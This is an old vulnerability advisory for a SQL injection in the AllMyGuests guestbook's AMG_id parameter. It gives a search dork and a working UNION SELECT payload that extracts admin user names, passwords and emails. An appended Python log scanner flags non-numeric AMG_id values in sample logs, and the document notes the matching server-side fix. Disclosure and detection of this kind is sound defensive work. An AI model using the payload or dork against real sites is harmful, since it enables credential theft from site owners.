# Title : AllMyGuests <= 0.4.1 (AMG_id) Remote SQL Injection Vulnerability
# Published : 2008-04-19
# Author : Player


########################################################
#
#  Found by : -=Player=-
#
#  Contacts : 282-246-419 (ICQ)
#
#  Greatz to: Lidloses_Auge, Suicide, enco, Free-Hack
#
########################################################
#
#  Script   : AllMyGuests
#
#  Site     : http://www.php-resource.net/
#
#  Dork     : "powered by AllMyGuests"
#
#  Vuln     : index.php
#
#  Parameter: AMG_id
#
#  Injection: index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
#
#  Example  : http://site.de/allmyguest/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
#
########################################################
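
For defenders reviewing web server logs for this issue, the following is an added example (not part of the original advisory and not AllMyGuests code). It flags requests to index.php whose AMG_id value is not a plain integer. That AMG_id is normally a numeric entry id is an assumption; the log lines are constructed samples in combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Apr/2008:10:01:02 +0200] "GET /allmyguest/index.php?AMG_open=comments&AMG_id=17 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [19/Apr/2008:10:03:44 +0200] "GET /allmyguest/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3 HTTP/1.1" 200 4871',
    '203.0.113.9 - - [19/Apr/2008:10:04:10 +0200] "GET /allmyguest/index.php?AMG_open=comments&AMG_id=5%20or%201=1 HTTP/1.1" 200 4990',
    '198.51.100.7 - - [19/Apr/2008:10:05:00 +0200] "GET /allmyguest/index.php HTTP/1.1" 200 6000',
]

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Assumption: a legitimate AMG_id is a short run of decimal digits.
VALID_ID_RE = re.compile(r"\d{1,10}")


def suspicious_amg_requests(lines):
    """Return (client, decoded AMG_id) for every non-numeric AMG_id seen."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parsable request line
        client, target = match.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("index.php"):
            continue
        # parse_qs URL-decodes values, so "+" and "%20" both become spaces.
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("AMG_id", []):
            if not VALID_ID_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_amg_requests(SAMPLE_LOG):
        print(f"{client}: non-numeric AMG_id {value!r}")
```

The same integer-only check, applied in index.php before AMG_id reaches the query, is the corresponding server-side fix.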